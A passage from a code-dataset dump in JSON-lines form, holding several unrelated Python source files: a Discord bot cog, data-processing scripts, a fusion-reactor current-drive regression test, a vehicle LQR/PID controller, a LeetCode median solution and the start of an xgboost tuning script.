new_category_subcommand_error(self, ctx, error):\n if isinstance(error, commands.MissingPermissions):\n await ctx.send('You don\\'t have the perm: `Manage Server`!')\n \n @new_channel_subcommand.error\n async def new_channel_subcommand_error(self, ctx, error):\n if isinstance(error, commands.MissingPermissions):\n await ctx.send('You don\\'t have the perm: `Manage Channels`!')\n if isinstance(error, commands.BadArgument):\n await ctx.send('that category is invalid')\n\n @new_role_subcommand.error\n async def new_role_subcommand_error(self, ctx, error):\n if isinstance(error, commands.MissingPermissions):\n await ctx.send('You don\\'t have the perm: `Manage Roles`!')\n\n @new_thread_subcommand.error\n async def new_thread_subcommand_error(self, ctx, error):\n if isinstance(error, commands.MissingPermissions):\n await ctx.send('You don\\'t have either the `Create Public Threads` or `Create Private Threads` Perm!')\n if isinstance(error, commands.BadArgument):\n await ctx.send('that channel is invalid')\n \n\nasync def setup(bot):\n await bot.add_cog(new(bot))\n","repo_name":"rushil534/mrmorale","sub_path":"moderation/new.py","file_name":"new.py","file_ext":"py","file_size_in_byte":4751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"33094066583","text":"import operator\nimport sys\nimport glob\nimport json\nfrom collections import defaultdict\n\nlibrary=sys.argv[1]\ndata_location=\"../../output/%s/*.json\" % library\n\ncounting=defaultdict(int)\n\nfor f in glob.glob(data_location):\n\twith open(f, 'r') as myfile:\n\t\tfor line in myfile:\n\t\t\tj=json.loads(line)\n\t\t\tif len(j['untagged']):\n\t\t\t\tfor k in j['untagged']:\n\t\t\t\t\tcounting[k]+=j['untagged'][k]\nsorted_counts = sorted(counting.items(), key=operator.itemgetter(1), reverse=True)\n\nprint(sorted_counts[:10])\n","repo_name":"filievski/LODLanguages","sub_path":"make_paper_tables/third_submission/create_table_7.py","file_name":"create_table_7.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"73322474875","text":"import pandas as pd\n\nfile = pd.read_csv(\"../data/autos.csv\", sep=\";\")\nfile2 = file.drop_duplicates(['price'])\nfile2 = pd.DataFrame(file2, columns=['price'])\nfile2.to_csv('../data/price.txt', sep=';', index=False, header=False)\n\nfile3 = file.drop_duplicates(['kilometer']) \nfile3 = pd.DataFrame(file3, columns=['kilometer'])\nfile3.to_csv('../data/kilometer.txt', sep=';', index=False, header=False)\n","repo_name":"gitdriss/MergeAndSortAppInCuda","sub_path":"script/doc.py","file_name":"doc.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"15609521144","text":"import os\nimport magic\n\n# Set the path to the directory containing the images\npath = \"decrypted_nsfw\"\n\n# Create a new directory to store the renamed images\nnew_dir = os.path.join(path, \"new\")\nif not os.path.exists(new_dir):\n os.mkdir(new_dir)\n\n# Get a list of all files in the directory\nfiles = os.listdir(path)\n\n# Initialize the magic library to detect file types\nmime = magic.Magic(mime=True)\n\n# Loop through each file in the directory\nfor file in files:\n # Check if the current item is a file and an image\n file_path = os.path.join(path, file)\n if os.path.isfile(file_path) and \"image\" in mime.from_file(file_path):\n # Determine the file type based on the file header\n file_type = mime.from_file(file_path).split(\"/\")[1]\n # Rename the file with the appropriate file extension\n new_name = f\"{os.path.splitext(file)[0]}.{file_type}\"\n os.rename(file_path, os.path.join(new_dir, new_name))\n\n","repo_name":"inferno0230/ganyu_collection","sub_path":"extension.py","file_name":"extension.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"70517446396","text":"import torch\n\n\ndef _get_matcher(targets, labels):\n \"\"\"Returns a boolean tensor.\"\"\"\n matcher = torch.eq(targets.unsqueeze(dim=1), labels)\n if labels.ndim == 2:\n # if the labels are one-hot vectors\n num_classes = targets.size()[1]\n matcher = torch.eq(torch.sum(matcher, dim=-1), num_classes)\n return matcher\n\n\ndef error_type_determination(\n distances,\n target_labels,\n prototype_labels,\n theta_boundary,\n):\n matcher = _get_matcher(target_labels, prototype_labels)\n not_matcher = torch.bitwise_not(matcher)\n\n d_tilde = distances - theta_boundary\n\n is_in_bound = d_tilde < 0\n is_out_of_bound = d_tilde >= 0\n\n tp = torch.logical_and(is_in_bound, matcher)\n fn = torch.logical_and(is_out_of_bound, matcher)\n tn = torch.logical_and(is_out_of_bound, not_matcher)\n fp = torch.logical_and(is_in_bound, not_matcher)\n\n return tp, tn, fp, fn\n\n\ndef csi_score(tpLoss, tnLoss, fpLoss, fnLoss):\n csi = (tpLoss) / (fnLoss + fpLoss + tpLoss)\n return csi\n\n\ndef ppcr_score(tpLoss, tnLoss, fpLoss, fnLoss):\n ppcr = (tpLoss + fpLoss) / (tpLoss + fpLoss + tnLoss + fnLoss)\n return ppcr\n\n\ndef prob_contrastive_score(tpLoss, tnLoss, fpLoss, fnLoss):\n pcs = tpLoss - fpLoss\n return pcs\n\n\ndef test_score(tpLoss, tnLoss, fpLoss, fnLoss):\n test = (fpLoss + fnLoss)\n return -test\n\n\ndef accuracy_score(tpLoss, tnLoss, fpLoss, fnLoss):\n accuracy = (tpLoss + tnLoss) / (tpLoss + tnLoss + fpLoss + fnLoss)\n return accuracy\n\n\nSCORES = {\n \"csi\": csi_score,\n \"ppcr\": ppcr_score,\n \"accuracy\": accuracy_score,\n \"test1\": test_score,\n \"pcs\": prob_contrastive_score,\n}\n\n\ndef get_scores(score, tpLoss, tnLoss, fpLoss, fnLoss):\n\n if score not in SCORES:\n raise ValueError(\n f\"Unknown distribution {score} for distribution_handler, choose from {list(SCORES.keys())}\"\n )\n\n return SCORES[score](tpLoss, tnLoss, fpLoss, fnLoss)\n","repo_name":"danielstaps/SupervisedVectorQuantizationOCC","sub_path":"prototorch_oneclass/functions/confusion.py","file_name":"confusion.py","file_ext":"py","file_size_in_byte":1929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"5492805007","text":"import pytest\nfrom typing import NamedTuple, Any\n\n\nfrom process.fortran import (\n current_drive_variables,\n cost_variables,\n physics_variables,\n heat_transport_variables,\n)\nfrom process.current_drive import CurrentDrive\n\n\n@pytest.fixture\ndef current_drive():\n \"\"\"Provides CurrentDrive object for testing.\n\n :returns current_drive: initialised CurrentDrive object\n :rtype: process.current_drive.CurrentDrive\n \"\"\"\n return CurrentDrive()\n\n\nclass CudrivParam(NamedTuple):\n pinjwpfix: Any = None\n\n pinjwp: Any = None\n\n echpwr: Any = None\n\n pnbeam: Any = None\n\n plhybd: Any = None\n\n cnbeam: Any = None\n\n porbitlossmw: Any = None\n\n iefrf: Any = None\n\n iefrffix: Any = None\n\n pheat: Any = None\n\n pheatfix: Any = None\n\n pinjfixmw: Any = None\n\n irfcd: Any = None\n\n feffcd: Any = None\n\n fpion: Any = None\n\n nbshinef: Any = None\n\n gamcd: Any = None\n\n gamma_ecrh: Any = None\n\n etalh: Any = None\n\n etacd: Any = None\n\n etacdfix: Any = None\n\n etaech: Any = None\n\n forbitloss: Any = None\n\n pinjmw: Any = None\n\n pwpnb: Any = None\n\n etanbi: Any = None\n\n enbeam: Any = None\n\n effcd: Any = None\n\n pwplh: Any = None\n\n echwpow: Any = None\n\n pnbitot: Any = None\n\n nbshinemw: Any = None\n\n pinjemw: Any = None\n\n pinjimw: Any = None\n\n bigq: Any = None\n\n bootipf: Any = None\n\n bscfmax: Any = None\n\n taubeam: Any = None\n\n pinjalw: Any = None\n\n nbshield: Any = None\n\n frbeam: Any = None\n\n rtanbeam: Any = None\n\n rtanmax: Any = None\n\n diaipf: Any = None\n\n psipf: Any = None\n\n plasipf: Any = None\n\n harnum: Any = None\n\n xi_ebw: Any = None\n\n dene: Any = None\n\n te: Any = None\n\n rmajor: Any = None\n\n ten: Any = None\n\n zeff: Any = None\n\n dlamee: Any = None\n\n beta: Any = None\n\n rhopedt: Any = None\n\n rhopedn: Any = None\n\n te0: Any = None\n\n teped: Any = None\n\n tesep: Any = None\n\n alphat: Any = None\n\n alphan: Any = None\n\n ne0: Any = None\n\n nesep: Any = None\n\n neped: Any = None\n\n bt: Any = None\n\n rminor: Any = None\n\n tbeta: Any = None\n\n plascur: Any = None\n\n ipedestal: Any = None\n\n faccd: Any = None\n\n ignite: Any = None\n\n pohmmw: Any = None\n\n powfmw: Any = None\n\n facoh: Any = None\n\n fvsbrnni: Any = None\n\n startupratio: Any = None\n\n iprint: Any = None\n\n outfile: Any = None\n\n expected_pinjwp: Any = None\n\n expected_echpwr: Any = None\n\n expected_gamcd: Any = None\n\n expected_etacd: Any = None\n\n expected_pinjmw: Any = None\n\n expected_effcd: Any = None\n\n expected_echwpow: Any = None\n\n expected_pinjemw: Any = None\n\n expected_bigq: Any = None\n\n\n@pytest.mark.parametrize(\n \"cudrivparam\",\n (\n CudrivParam(\n pinjwpfix=0,\n pinjwp=0,\n echpwr=0,\n pnbeam=0,\n plhybd=0,\n cnbeam=0,\n porbitlossmw=0,\n iefrf=10,\n iefrffix=0,\n pheat=75,\n pheatfix=0,\n pinjfixmw=0,\n irfcd=1,\n feffcd=1,\n fpion=0.5,\n nbshinef=0,\n gamcd=0,\n gamma_ecrh=0.30000000000000004,\n etalh=0.29999999999999999,\n etacd=0,\n etacdfix=0,\n etaech=0.5,\n forbitloss=0,\n pinjmw=0,\n pwpnb=0,\n etanbi=0.29999999999999999,\n enbeam=1000,\n effcd=0,\n pwplh=0,\n echwpow=0,\n pnbitot=0,\n nbshinemw=0,\n pinjemw=0,\n pinjimw=0,\n bigq=0,\n bootipf=0.27635918746616817,\n bscfmax=0.95000000000000007,\n taubeam=0,\n pinjalw=200,\n nbshield=0.5,\n frbeam=1.05,\n rtanbeam=0,\n rtanmax=0,\n diaipf=0,\n psipf=0,\n plasipf=0.27635918746616817,\n harnum=1,\n xi_ebw=0.80000000000000004,\n dene=7.5e19,\n te=12,\n rmajor=8,\n ten=12.626131115905864,\n zeff=2.0909945616489103,\n dlamee=17.510652035055571,\n beta=0.030000000000000006,\n rhopedt=0.94000000000000006,\n rhopedn=0.94000000000000006,\n te0=24.402321098330372,\n teped=5.5,\n tesep=0.10000000000000001,\n alphat=1.45,\n alphan=1,\n ne0=8.515060981068918e19,\n nesep=4.1177885154594193e19,\n neped=7.000240476281013e19,\n bt=5.7000000000000002,\n rminor=2.6666666666666665,\n tbeta=2,\n plascur=18398455.678867526,\n ipedestal=1,\n faccd=0.12364081253383186,\n ignite=0,\n pohmmw=0,\n powfmw=0,\n facoh=0.59999999999999998,\n fvsbrnni=0.40000000000000002,\n startupratio=1,\n iprint=0,\n outfile=11,\n expected_pinjwp=240.99200038011492,\n expected_echpwr=120.49600019005746,\n expected_gamcd=0.30000000000000004,\n expected_etacd=0.5,\n expected_pinjmw=120.49600019005746,\n expected_effcd=0.05000000000000001,\n expected_echwpow=240.99200038011492,\n expected_pinjemw=120.49600019005746,\n expected_bigq=0,\n ),\n CudrivParam(\n pinjwpfix=0,\n pinjwp=240.99200038011492,\n echpwr=120.49600019005746,\n pnbeam=0,\n plhybd=0,\n cnbeam=0,\n porbitlossmw=0,\n iefrf=10,\n iefrffix=0,\n pheat=75,\n pheatfix=0,\n pinjfixmw=0,\n irfcd=1,\n feffcd=1,\n fpion=0.5,\n nbshinef=0,\n gamcd=0.30000000000000004,\n gamma_ecrh=0.30000000000000004,\n etalh=0.29999999999999999,\n etacd=0.5,\n etacdfix=0,\n etaech=0.5,\n forbitloss=0,\n pinjmw=120.49600019005746,\n pwpnb=0,\n etanbi=0.29999999999999999,\n enbeam=1000,\n effcd=0.05000000000000001,\n pwplh=0,\n echwpow=240.99200038011492,\n pnbitot=0,\n nbshinemw=0,\n pinjemw=120.49600019005746,\n pinjimw=0,\n bigq=0,\n bootipf=0.27635918746616817,\n bscfmax=0.95000000000000007,\n taubeam=0,\n pinjalw=200,\n nbshield=0.5,\n frbeam=1.05,\n rtanbeam=8.4000000000000004,\n rtanmax=13.179564451855533,\n diaipf=0,\n psipf=0,\n plasipf=0.27635918746616817,\n harnum=1,\n xi_ebw=0.80000000000000004,\n dene=7.5e19,\n te=12,\n rmajor=8,\n ten=12.626131115905864,\n zeff=2.0909945616489103,\n dlamee=17.510652035055571,\n beta=0.030000000000000006,\n rhopedt=0.94000000000000006,\n rhopedn=0.94000000000000006,\n te0=24.402321098330372,\n teped=5.5,\n tesep=0.10000000000000001,\n alphat=1.45,\n alphan=1,\n ne0=8.515060981068918e19,\n nesep=4.1177885154594193e19,\n neped=7.000240476281013e19,\n bt=5.7000000000000002,\n rminor=2.6666666666666665,\n tbeta=2,\n plascur=18398455.678867526,\n ipedestal=1,\n faccd=0.12364081253383186,\n ignite=0,\n pohmmw=0.76707314489379119,\n powfmw=1051.6562748933977,\n facoh=0.59999999999999998,\n fvsbrnni=0.40000000000000002,\n startupratio=1,\n iprint=0,\n outfile=11,\n expected_pinjwp=240.99200038011492,\n expected_echpwr=120.49600019005746,\n expected_gamcd=0.30000000000000004,\n expected_etacd=0.5,\n expected_pinjmw=120.49600019005746,\n expected_effcd=0.05000000000000001,\n expected_echwpow=240.99200038011492,\n expected_pinjemw=120.49600019005746,\n expected_bigq=8.6725187311435423,\n ),\n ),\n)\ndef test_cudriv(cudrivparam, monkeypatch, current_drive):\n \"\"\"\n Automatically generated Regression Unit Test for cudriv.\n\n This test was generated using data from tests/regression/scenarios/large-tokamak/IN.DAT.\n\n :param cudrivparam: the data used to mock and assert in this test.\n :type cudrivparam: cudrivparam\n\n :param monkeypatch: pytest fixture used to mock module/class variables\n :type monkeypatch: _pytest.monkeypatch.monkeypatch\n \"\"\"\n\n monkeypatch.setattr(heat_transport_variables, \"pinjwpfix\", cudrivparam.pinjwpfix)\n\n monkeypatch.setattr(heat_transport_variables, \"pinjwp\", cudrivparam.pinjwp)\n\n monkeypatch.setattr(current_drive_variables, \"echpwr\", cudrivparam.echpwr)\n\n monkeypatch.setattr(current_drive_variables, \"pnbeam\", cudrivparam.pnbeam)\n\n monkeypatch.setattr(current_drive_variables, \"plhybd\", cudrivparam.plhybd)\n\n monkeypatch.setattr(current_drive_variables, \"cnbeam\", cudrivparam.cnbeam)\n\n monkeypatch.setattr(\n current_drive_variables, \"porbitlossmw\", cudrivparam.porbitlossmw\n )\n\n monkeypatch.setattr(current_drive_variables, \"iefrf\", cudrivparam.iefrf)\n\n monkeypatch.setattr(current_drive_variables, \"iefrffix\", cudrivparam.iefrffix)\n\n monkeypatch.setattr(current_drive_variables, \"pheat\", cudrivparam.pheat)\n\n monkeypatch.setattr(current_drive_variables, \"pheatfix\", cudrivparam.pheatfix)\n\n monkeypatch.setattr(current_drive_variables, \"pinjfixmw\", cudrivparam.pinjfixmw)\n\n monkeypatch.setattr(current_drive_variables, \"irfcd\", cudrivparam.irfcd)\n\n monkeypatch.setattr(current_drive_variables, \"feffcd\", cudrivparam.feffcd)\n\n monkeypatch.setattr(current_drive_variables, \"fpion\", cudrivparam.fpion)\n\n monkeypatch.setattr(current_drive_variables, \"nbshinef\", cudrivparam.nbshinef)\n\n monkeypatch.setattr(current_drive_variables, \"gamcd\", cudrivparam.gamcd)\n\n monkeypatch.setattr(current_drive_variables, \"gamma_ecrh\", cudrivparam.gamma_ecrh)\n\n monkeypatch.setattr(current_drive_variables, \"etalh\", cudrivparam.etalh)\n\n monkeypatch.setattr(current_drive_variables, \"etacd\", cudrivparam.etacd)\n\n monkeypatch.setattr(current_drive_variables, \"etacdfix\", cudrivparam.etacdfix)\n\n monkeypatch.setattr(current_drive_variables, \"etaech\", cudrivparam.etaech)\n\n monkeypatch.setattr(current_drive_variables, \"forbitloss\", cudrivparam.forbitloss)\n\n monkeypatch.setattr(current_drive_variables, \"pinjmw\", cudrivparam.pinjmw)\n\n monkeypatch.setattr(current_drive_variables, \"pwpnb\", cudrivparam.pwpnb)\n\n monkeypatch.setattr(current_drive_variables, \"etanbi\", cudrivparam.etanbi)\n\n monkeypatch.setattr(current_drive_variables, \"enbeam\", cudrivparam.enbeam)\n\n monkeypatch.setattr(current_drive_variables, \"effcd\", cudrivparam.effcd)\n\n monkeypatch.setattr(current_drive_variables, \"pwplh\", cudrivparam.pwplh)\n\n monkeypatch.setattr(current_drive_variables, \"echwpow\", cudrivparam.echwpow)\n\n monkeypatch.setattr(current_drive_variables, \"pnbitot\", cudrivparam.pnbitot)\n\n monkeypatch.setattr(current_drive_variables, \"nbshinemw\", cudrivparam.nbshinemw)\n\n monkeypatch.setattr(current_drive_variables, \"pinjemw\", cudrivparam.pinjemw)\n\n monkeypatch.setattr(current_drive_variables, \"pinjimw\", cudrivparam.pinjimw)\n\n monkeypatch.setattr(current_drive_variables, \"bigq\", cudrivparam.bigq)\n\n monkeypatch.setattr(current_drive_variables, \"bootipf\", cudrivparam.bootipf)\n\n monkeypatch.setattr(current_drive_variables, \"bscfmax\", cudrivparam.bscfmax)\n\n monkeypatch.setattr(current_drive_variables, \"taubeam\", cudrivparam.taubeam)\n\n monkeypatch.setattr(current_drive_variables, \"pinjalw\", cudrivparam.pinjalw)\n\n monkeypatch.setattr(current_drive_variables, \"nbshield\", cudrivparam.nbshield)\n\n monkeypatch.setattr(current_drive_variables, \"frbeam\", cudrivparam.frbeam)\n\n monkeypatch.setattr(current_drive_variables, \"rtanbeam\", cudrivparam.rtanbeam)\n\n monkeypatch.setattr(current_drive_variables, \"rtanmax\", cudrivparam.rtanmax)\n\n monkeypatch.setattr(current_drive_variables, \"diaipf\", cudrivparam.diaipf)\n\n monkeypatch.setattr(current_drive_variables, \"psipf\", cudrivparam.psipf)\n\n monkeypatch.setattr(current_drive_variables, \"plasipf\", cudrivparam.plasipf)\n\n monkeypatch.setattr(current_drive_variables, \"harnum\", cudrivparam.harnum)\n\n monkeypatch.setattr(current_drive_variables, \"xi_ebw\", cudrivparam.xi_ebw)\n\n monkeypatch.setattr(physics_variables, \"dene\", cudrivparam.dene)\n\n monkeypatch.setattr(physics_variables, \"te\", cudrivparam.te)\n\n monkeypatch.setattr(physics_variables, \"rmajor\", cudrivparam.rmajor)\n\n monkeypatch.setattr(physics_variables, \"ten\", cudrivparam.ten)\n\n monkeypatch.setattr(physics_variables, \"zeff\", cudrivparam.zeff)\n\n monkeypatch.setattr(physics_variables, \"dlamee\", cudrivparam.dlamee)\n\n monkeypatch.setattr(physics_variables, \"beta\", cudrivparam.beta)\n\n monkeypatch.setattr(physics_variables, \"rhopedt\", cudrivparam.rhopedt)\n\n monkeypatch.setattr(physics_variables, \"rhopedn\", cudrivparam.rhopedn)\n\n monkeypatch.setattr(physics_variables, \"te0\", cudrivparam.te0)\n\n monkeypatch.setattr(physics_variables, \"teped\", cudrivparam.teped)\n\n monkeypatch.setattr(physics_variables, \"tesep\", cudrivparam.tesep)\n\n monkeypatch.setattr(physics_variables, \"alphat\", cudrivparam.alphat)\n\n monkeypatch.setattr(physics_variables, \"alphan\", cudrivparam.alphan)\n\n monkeypatch.setattr(physics_variables, \"ne0\", cudrivparam.ne0)\n\n monkeypatch.setattr(physics_variables, \"nesep\", cudrivparam.nesep)\n\n monkeypatch.setattr(physics_variables, \"neped\", cudrivparam.neped)\n\n monkeypatch.setattr(physics_variables, \"bt\", cudrivparam.bt)\n\n monkeypatch.setattr(physics_variables, \"rminor\", cudrivparam.rminor)\n\n monkeypatch.setattr(physics_variables, \"tbeta\", cudrivparam.tbeta)\n\n monkeypatch.setattr(physics_variables, \"plascur\", cudrivparam.plascur)\n\n monkeypatch.setattr(physics_variables, \"ipedestal\", cudrivparam.ipedestal)\n\n monkeypatch.setattr(physics_variables, \"faccd\", cudrivparam.faccd)\n\n monkeypatch.setattr(physics_variables, \"ignite\", cudrivparam.ignite)\n\n monkeypatch.setattr(physics_variables, \"pohmmw\", cudrivparam.pohmmw)\n\n monkeypatch.setattr(physics_variables, \"powfmw\", cudrivparam.powfmw)\n\n monkeypatch.setattr(physics_variables, \"facoh\", cudrivparam.facoh)\n\n monkeypatch.setattr(physics_variables, \"fvsbrnni\", cudrivparam.fvsbrnni)\n\n monkeypatch.setattr(cost_variables, \"startupratio\", cudrivparam.startupratio)\n\n current_drive.cudriv(output=False)\n\n assert heat_transport_variables.pinjwp == pytest.approx(cudrivparam.expected_pinjwp)\n\n assert current_drive_variables.echpwr == pytest.approx(cudrivparam.expected_echpwr)\n\n assert current_drive_variables.gamcd == pytest.approx(cudrivparam.expected_gamcd)\n\n assert current_drive_variables.etacd == pytest.approx(cudrivparam.expected_etacd)\n\n assert current_drive_variables.pinjmw == pytest.approx(cudrivparam.expected_pinjmw)\n\n assert current_drive_variables.effcd == pytest.approx(cudrivparam.expected_effcd)\n\n assert current_drive_variables.echwpow == pytest.approx(\n cudrivparam.expected_echwpow\n )\n\n assert current_drive_variables.pinjemw == pytest.approx(\n cudrivparam.expected_pinjemw\n )\n\n assert current_drive_variables.bigq == pytest.approx(cudrivparam.expected_bigq)\n\n\ndef test_sigbeam(current_drive):\n assert current_drive.sigbeam(\n 1e3, 13.07, 8.0e-1, 0.1, 1e-4, 1e-4, 1e-4\n ) == pytest.approx(2.013589662302492e-11)\n","repo_name":"ukaea/PROCESS","sub_path":"tests/unit/test_current_drive.py","file_name":"test_current_drive.py","file_ext":"py","file_size_in_byte":15787,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"96"} +{"seq_id":"4309586986","text":"# Fill in the respective functions to implement the controller\n\n# Import libraries\nimport numpy as np\nfrom base_controller import BaseController\nfrom scipy import signal, linalg\nfrom util import *\nimport math\nfrom scipy.ndimage import gaussian_filter1d\n\n# CustomController class (inherits from BaseController)\nclass CustomController(BaseController):\n\n def __init__(self, trajectory):\n\n super().__init__(trajectory)\n\n # Define constants\n # These can be ignored in P1\n self.lr = 1.39\n self.lf = 1.55\n self.Ca = 20000\n self.Iz = 25854\n self.m = 1888.6\n self.g = 9.81\n\n # Add additional member variables according to your need here.\n \n self.previous_error_kp = 0\n self.error_ki = 0\n self.previous_delta = 0\n \n self.kp = 400\n self.ki = 8\n self.kd = -0.01\n self.error_dis = 0\n \n \n self.curve = self.computeCurvature()\n def computeCurvature(self):\n # Function to compute and return the curvature of a trajectory.\n sigmaGauss = 5 # We can change this value to increase filter strength\n trajectory = self.trajectory\n xp = gaussian_filter1d(input=trajectory[:,0],sigma=sigmaGauss,order=1)\n xpp = gaussian_filter1d(input=trajectory[:,0],sigma=sigmaGauss,order=2)\n yp = gaussian_filter1d(input=trajectory[:,1],sigma=sigmaGauss,order=1)\n ypp = gaussian_filter1d(input=trajectory[:,1],sigma=sigmaGauss,order=2)\n curve = np.zeros(len(trajectory))\n for i in range(len(xp)):\n curve[i] = (xp[i]*ypp[i] - yp[i]*xpp[i])/(xp[i]**2 + yp[i]**2)**1.5\n \n return curve\n\n def update(self, timestep):\n\n trajectory = self.trajectory\n\n lr = self.lr\n lf = self.lf\n Ca = self.Ca\n Iz = self.Iz\n m = self.m\n g = self.g\n\n\n\n kp = self.kp\n kd = self.ki\n ki = self.kd \n \n \n # Fetch the states from the BaseController method\n delT, X, Y, xdot, ydot, psi, psidot = super().getStates(timestep)\n \n \n \n dis, ind = closestNode(X,Y,trajectory)\n jia = 0\n if ind < len(trajectory) - 100:\n jia = 100\n else:\n jia = len(trajectory) - ind - 1\n \n if ind < len(trajectory) - 150:\n lakua = 150\n else:\n lakua = len(trajectory) - ind - 1\n \n X_desired = trajectory[ind + jia,0]\n Y_desired = trajectory[ind + jia,1]\n \n X_curv = trajectory[ind + lakua,0]\n Y_curv = trajectory[ind + lakua,1]\n \n X_pre = trajectory[ind,0]\n Y_pre = trajectory[ind,1]\n psi_desired = np.arctan2(Y_desired - Y_pre, X_desired - X_pre)\n psi_curv = np.arctan2(Y_curv - Y_pre, X_curv - X_pre)\n # Design your controllers in the spaces below. \n # Remember, your controllers will need to use the states\n # to calculate control inputs (F, delta). \n\n # ---------------|Lateral Controller|-------------------------\n A = np.array([[0, 1, 0, 0], [0, -4*Ca / (m * xdot), 4*Ca/m, (-2*Ca*(lf - lr))/(m*xdot)], [0, 0, 0, 1], [0, (-2*Ca*(lf - lr)) / (Iz * xdot), (2*Ca*(lf - lr)) / Iz, (-2*Ca*(np.power(lf, 2) + np.power(lr, 2))) / (Iz * xdot)]])\n B = np.array([[0], [2*Ca / m], [0], [(2 * Ca* lf) / Iz]])\n C = np.identity(4)\n D = np.array([[0],[0],[0],[0]])\n CT = signal.StateSpace(A,B,C,D)\n DT = CT.to_discrete(delT)\n A = DT.A\n B = DT.B\n \n \n haha = (Y-Y_curv)*np.cos(psi_curv)-(X-X_curv)*np.sin(psi_curv)\n #print(self.curve[ind + jia])\n e1 = (Y-Y_desired)*np.cos(psi_desired)-(X-X_desired)*np.sin(psi_desired)\n e2 = wrapToPi(psi - psi_desired)\n \n e1d = xdot * e2 + ydot\n psidot_desired = xdot*self.curve[ind + jia]\n e2d = psidot - psidot_desired\n if(abs(e2)>0.11):\n Vx = 5\n else:\n Vx = 18\n \n \n \n \n Q = np.eye(4)\n R = 1\n \n\n S = linalg.solve_discrete_are(A, B, Q, R)\n K= -np.linalg.inv(B.T@S@B+R)@B.T@S@A\n \n \n \n self.error_dis = e1\n \n\n e = np.array([e1,e1d,e2,e2d])\n delta = float(K @ e)\n \n \n \n\n # ---------------|Longitudinal Controller|-------------------------\n error_kp = Vx - xdot\n \n \n self.error_ki += error_kp * delT \n \n \n error_kd = (error_kp - self.previous_error_kp)/delT\n self.previous_error_kp = error_kp\n \n \n F = kp * error_kp + ki * self.error_ki + kd * error_kd\n\n # Return all states and calculated control inputs (F, delta)\n \n \n return X, Y, xdot, ydot, psi, psidot, F, delta\n","repo_name":"HuaiqianShou/24-677-Linear-Control-Systems","sub_path":"Project3/Code/controllers/main/your_controller.py","file_name":"your_controller.py","file_ext":"py","file_size_in_byte":4871,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"96"} +{"seq_id":"72564048956","text":"\"\"\"\nGiven two sorted arrays nums1 and nums2 of size m and n respectively, return the median of the two sorted arrays.\n\nFollow up: The overall run time complexity should be O(log (m+n)).\n\n\n\nExample 1:\n\nInput: nums1 = [1,3], nums2 = [2]\nOutput: 2.00000\nExplanation: merged array = [1,2,3] and median is 2.\nExample 2:\n\nInput: nums1 = [1,2], nums2 = [3,4]\nOutput: 2.50000\nExplanation: merged array = [1,2,3,4] and median is (2 + 3) / 2 = 2.5.\nExample 3:\n\nInput: nums1 = [0,0], nums2 = [0,0]\nOutput: 0.00000\nExample 4:\n\nInput: nums1 = [], nums2 = [1]\nOutput: 1.00000\nExample 5:\n\nInput: nums1 = [2], nums2 = []\nOutput: 2.00000\n\n\nConstraints:\n\nnums1.length == m\nnums2.length == n\n0 <= m <= 1000\n0 <= n <= 1000\n1 <= m + n <= 2000\n-106 <= nums1[i], nums2[i] <= 106\n\"\"\"\n\n\"\"\"\n更短的列表至少会拿出大约二分之一的来和长列表PK\n\"\"\"\n\n\nclass Solution(object):\n def findMedianSortedArrays(self, nums1, nums2):\n \"\"\"\n :param nums1:\n :param nums2:\n :return:\n \"\"\"\n l = len(nums1) + len(nums2)\n if l % 2 == 1:\n return self.findKth(nums1, nums2, l // 2)\n else:\n return (self.findKth(nums1, nums2, l // 2 - 1) + self.findKth(nums1, nums2, l // 2)) / 2.0\n\n def findKth(self, A, B, k):\n if len(A) > len(B):\n A, B = B, A\n if not A:\n return B[k]\n if k == len(A) + len(B) - 1:\n return max(A[-1], B[-1])\n i = len(A) // 2\n j = k - i\n if A[i] > B[j]:\n return self.findKth(A[:i], B[j:], i)\n else:\n return self.findKth(A[i:], B[:j], j)\n","repo_name":"yqxd/python_hards","sub_path":"0004MedianofTwoSortedArrays.py","file_name":"0004MedianofTwoSortedArrays.py","file_ext":"py","file_size_in_byte":1610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"15508081198","text":"#coding=utf-8\n\"\"\"\n基于xgboost的cv函数进行调参\n\"\"\"\nimport xgboost as xgb\nfrom sklearn.model_selection import train_test_split,GridSearchCV\nfrom sklearn.metrics import precision_score,recall_score\nimport pprint\nimport pandas as pd\nimport time\nimport numpy as np\nimport ConfigParser\nimport argparse\nimport os\n\nfrom tools import get_csr_labels,save2xgdata\n\n# parser\ndef arg_parser():\n parser = argparse.ArgumentParser()\n parser.add_argument('-c','--conf', required=True)\n parser.add_argument('-o', '--output', required=True)\n return parser.parse_args()\n\n# configure parser\ndef conf_parser(conf_path):\n cf = ConfigParser.ConfigParser()\n cf.read(conf_path)\n\n booster = cf.get('xg_conf', 'booster')\n silent = int(cf.get('xg_conf','silent'))\n nthread = int(cf.get('xg_conf', 'nthread'))\n\n eta = float(cf.get('xg_conf', 'eta'))\n gamma = float(cf.get('xg_conf', 'gamma'))\n max_delta_step = float(cf.get('xg_conf','max_delta_step'))\n p_lambda = float(cf.get('xg_conf', 'lambda'))\n alpha = float(cf.get('xg_conf', 'alpha'))\n sketch_eps = float(cf.get('xg_conf', 'sketch_eps'))\n refresh_leaf = int(cf.get('xg_conf', 'refresh_leaf'))\n max_depth = int(cf.get('xg_conf', 'max_depth'))\n subsample = float(cf.get('xg_conf', 'subsample'))\n min_child_weight = float(cf.get('xg_conf', 'min_child_weight'))\n colsample_bytree = float(cf.get('xg_conf', 'colsample_bytree'))\n\n objective = cf.get('xg_conf', 'objective')\n base_score = float(cf.get('xg_conf', 'base_score'))\n eval_metric = cf.get('xg_conf', 'eval_metric')\n ascend = int(cf.get('xg_conf','ascend'))\n seed = int(cf.get('xg_conf', 'seed'))\n\n\n save_period = int(cf.get('xg_conf', 'save_period'))\n eval = 